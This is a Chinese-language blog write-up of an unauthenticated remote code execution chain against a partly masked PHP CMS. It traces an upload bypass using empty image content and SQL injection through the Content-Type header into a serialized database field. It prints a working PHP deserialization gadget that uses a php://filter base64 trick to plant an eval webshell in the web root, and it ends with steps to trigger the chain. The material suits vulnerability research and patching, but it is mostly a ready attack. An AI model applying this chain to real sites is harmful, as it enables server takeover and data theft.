P***OK全版本前台无条件RCE

Security Classification: 【C-1】 | Publish Time:2024-09-25 | Category:Old Posts | Edit
Old Version | Diff |
Expiry Notice: The article was published three months ago. Please independently assess the validity of the technical methods and code mentioned within. :)

AI Info

The ownership of the data in this article is secured by blockchain encryption technology and smart contracts, and is solely owned by the creator.

AI Summary: 本文详细分析了 P***OK 全版本前台无条件 RCE 漏洞的成因与利用过程。攻击链始于通过构造空内容图片绕过上传检测，进而利用 SQL 注入覆盖数据库中的序列化字段，最终通过精心构造的 PHP gadget 触发反序列化，实现远程代码执行。整个漏洞利用过程无需登录，仅需开启游客附件上传功能即可利用。
AI Evaluation: 该文章对漏洞成因、代码审计路径、利用链构造及最终 RCE 实现进行了极为详尽的技术剖析，逻辑清晰，图文并茂，展示了完整的从 SQL 注入到反序列化攻击的进阶利用过程。尤其在 gadget 构造和 bypass 技巧方面体现了深厚的技术功底，是一篇高质量的漏洞分析文章。
AI Point: 92

### 漏洞利用条件

网站未关闭游客附件上传功能（默认开启）。

### 代码审计分析

首先尝试普通附件上传，发现无论何种图片均无法正常上传：

![图片](https://img.meituan.net/imgupload/ed47ab21f89e54a6666a7ac74673f12116944.png)

查看 `upload` 控制器代码，其位于 `/framework/www/` 目录下。重点关注 `save` 函数：

![图片](https://img.meituan.net/imgupload/b6a068c8ea52e51fd60017d041c05f4a55106.png)

跟进 `upload_base` 方法：

![图片](https://img.meituan.net/imgupload/abd27e03d4e1ee7d56b3963520c5223799145.png)

继续跟进 `getfile` 方法：

![图片](https://img.meituan.net/imgupload/1cacf4b1d6d58516f1873bf81e99115d53329.png)

此处通过 `var_dump` 输出变量，最终进入 `upload` 方法。继续追踪逻辑：

![图片](https://img.meituan.net/imgupload/861e843080ff3bd5ed128296bbe389d072922.png)

![图片](https://img.meituan.net/imgupload/0377dcfa4d27e7b9e2d1713ee62b8a7266307.png)

最终在此处返回，原因是 `$bin` 变量为真。要绕过此判断，需使 `$bin` 为空。通过 `var_dump` 发现 `$bin` 即图片文件内容。因此，将图片内容置空即可成功上传：

![图片](https://img.meituan.net/imgupload/9b5aa738632421d6d8a3b4fbadb6883334129.png)

回到 `base_upload` 方法：

![图片](https://img.meituan.net/imgupload/3d69fa6ebe4111f4bbe866f5c819c674109391.png)

发现调用了 `model->save` 方法。跟进 `save` 方法：

![图片](https://img.meituan.net/imgupload/61708fd615224c5c3afd7a045892bbda63884.png)

无论是否登录，均执行插入数据库操作，且未对数据进行过滤。即直接将数组 `$array` 全部插入数据库。通过 `var_dump` 查看可控字段：

![图片](https://img.meituan.net/imgupload/51bf7b6d42e6e89d7794afae3b8c142486276.png)

发现 `mime_type` 字段直接来源于 `Content-Type` 头，完全可控。可构造 SQL 注入语句进行拼接（此处不演示）。最终构造出如下 payload：

```sql
',sleep(5))#
```

![图片](https://img.meituan.net/imgupload/20ca7928c0298c9f921c0a6652396b5d125044.png)

成功触发 `sleep(5)`，证明存在 SQL 注入漏洞。但如何从 SQL 注入进一步实现 RCE 呢？

![图片](https://img.meituan.net/imgupload/8c7508ef45190b28e99a1157d5d9336146109.png)

继续查看代码，发现对 `attr` 字段进行了序列化操作，因此存在反序列化风险。由此引出两个问题：

#### 1. 如何覆盖序列化内容？

打印数组发现：

![图片](https://img.meituan.net/imgupload/4869656c145bb74d74c6fe4a6efaf845105777.png)

观察 SQL 语句：

**插入语句：**

```sql
INSERT INTO qinggan_res (`cate_id`,`folder`,`name`,`ext`,`filename`,`addtime`,`title`,`session_id`,`user_id`,`mime_type`,`attr`) VALUES('','res\/','db0846bb72407e1c.png','png','res\/db0846bb72407e1c.png','1608034638','3','0o8592k55lo99m8r9hg27roid8','','image\/png',sleep(5))#','a:2:{s:5:"width";i:622;s:6:"height";i:503;}')
```

**响应数据：**

```json
{"status":"ok","content":{"id":"117","cate_id":"1","folder":"res\/","name":"db0846bb72407e1c.png","ext":"png","filename":"res\/db0846bb72407e1c.png","ico":"res\/_cache\/_ico\/11\/117.png","addtime":"1608034638","title":"3","attr":"0","note":"","session_id":"0o8592k55lo99m8r9hg27roid8","user_id":"0","download":"0","admin_id":"0","mime_type":"image\/png","etype":"0","uploadtime":"2020-12-15 20:17:18"}}
```

发现可控字段与 `attr` 字段相邻，可直接覆盖 `attr` 变量。例如构造如下语句：

![图片](https://img.meituan.net/imgupload/cdbf4a7a38716a3725966c2d956cbce015038.png)

单引号闭合前面字段，英文逗号分割，`)` 闭合括号，`#` 注释多余语句。执行后访问数据库：

![图片](https://img.meituan.net/imgupload/85eb213b4347762bee59fc242eb542fc168824.png)

#### 2. 如何追加序列化内容？

可再写一条 `INSERT` SQL 语句，使用英文逗号分割追加。具体可参考 ichunqiu 对此案例的讲解（此处不赘述）。

发现 `res` 模型中的 `getone` 方法存在反序列化操作：

![图片](https://img.meituan.net/imgupload/30e6fc75991ad1d89df25cf2e304aa7b70379.png)

接下来需构造一个可造成 getshell 的 gadget。如何寻找合适的 gadget？

成功定位到 `cache` 类，路径如下：

![图片](https://img.meituan.net/imgupload/c7b90fee7ec5dda1bd2f4d882bb067b794946.png)

其在反序列化时会触发 `__destruct` 魔法函数：

![图片](https://img.meituan.net/imgupload/a249b3fb8d9e1b1f9e64f982a105eb4513314.png)

跟进 `save` 方法，发现存在 `file_put_contents` 操作：

![图片](https://img.meituan.net/imgupload/215f4e2e274b4dbecdb7c9dec320cbaf42805.png)

但为防止木马生成，加入了 `exit()` 函数。常用 bypass 方法为使用 `php://filter` 包装器：

```php
file_put_contents(php://filter/write=convert.base64-decode/resource=$id.php, '<?php exit();?>'.base64编码的shellcode)
```

该方式在写入时会先对内容进行 base64 解码，导致 `<?php exit();?>` 出错，而 base64 编码的 shellcode 正常还原。

此外，系统还对传入的 `content` 进行了序列化操作，但序列化不会改变字符串内容，因此传入的 base64 编码 shell 内容保持不变。

最终构造的 gadget 如下：

```php
<?php
class cache{
    protected $key_id;
    protected $key_list;
    protected $folder;

public function __construct(){
        $this->key_id = 'depy';
        $this->key_list = 'aa'.base64_encode('<?php eval($_GET["shell"]);?>');
        $this->folder = 'php://filter/write=convert.base64-decode/resource=';
    }
}

echo bin2hex(serialize(new cache()));
```

触发反序列化后，将在根目录生成 `depy.php` webshell，密码为 `shell`。

接下来需寻找前台可调用 `get_one` 方法的位置：

![图片](https://img.meituan.net/imgupload/a978ea9dc195725a705cd53fb15bca7e78200.png)

找到控制器中的 `replace` 方法，其根据 `GET` 参数 `oldid` 查询数据库，获取上传的图片，并调用 `get_one` 方法，从而触发反序列化。

例如上传图片时，将 `Content-Type` 设置为 gadget 内容：

![图片](https://img.meituan.net/imgupload/f867a1a80a44e8ac3156a8fc7d2472c2107432.png)

但实际插入数据库时即会触发反序列化，导致服务无响应（具体未追踪）。

若采用常规流程，如何获取图片 ID？有两种方法：

1. **爆破法**：附件 ID 为自增字段，不超过四位数，可暴力遍历强制触发。
2. **预上传法**：先上传一个无效文件，记录其 ID，则反序列化时 ID 为 +1。

### 利用流程

![图片](https://img.meituan.net/imgupload/305765a85aa3dad77b207f45071f3a419468.png)

通过 ID 进入 `replace` 方法，`oldid` 为上述获取的 ID。

![图片](https://img.meituan.net/imgupload/1f9f13b15cc8c93993eaf04b0b5b6e3636722.png)

通过 `oldid` 查询数据库，最终触发反序列化，生成 webshell 至根目录。

![图片](https://img.meituan.net/imgupload/bb02b3d8b501cce3700837bc6ddcb67f80276.png)

![图片](https://img.meituan.net/imgupload/8c8f013286bbc705370d1dda68a3adb5136947.png)

Comment List

Comment

© Copyright: This article is an original work and the copyright belongs to the Depy's docs unless marked as Reproduced

Please contact the blogger for authorization to reprint

P***OK全版本前台无条件RCE

© Copyright: This article is an original work and the copyright belongs to the Depy's docs unless marked as ReproducedPlease contact the blogger for authorization to reprint

© Copyright: This article is an original work and the copyright belongs to the Depy's docs unless marked as Reproduced

Please contact the blogger for authorization to reprint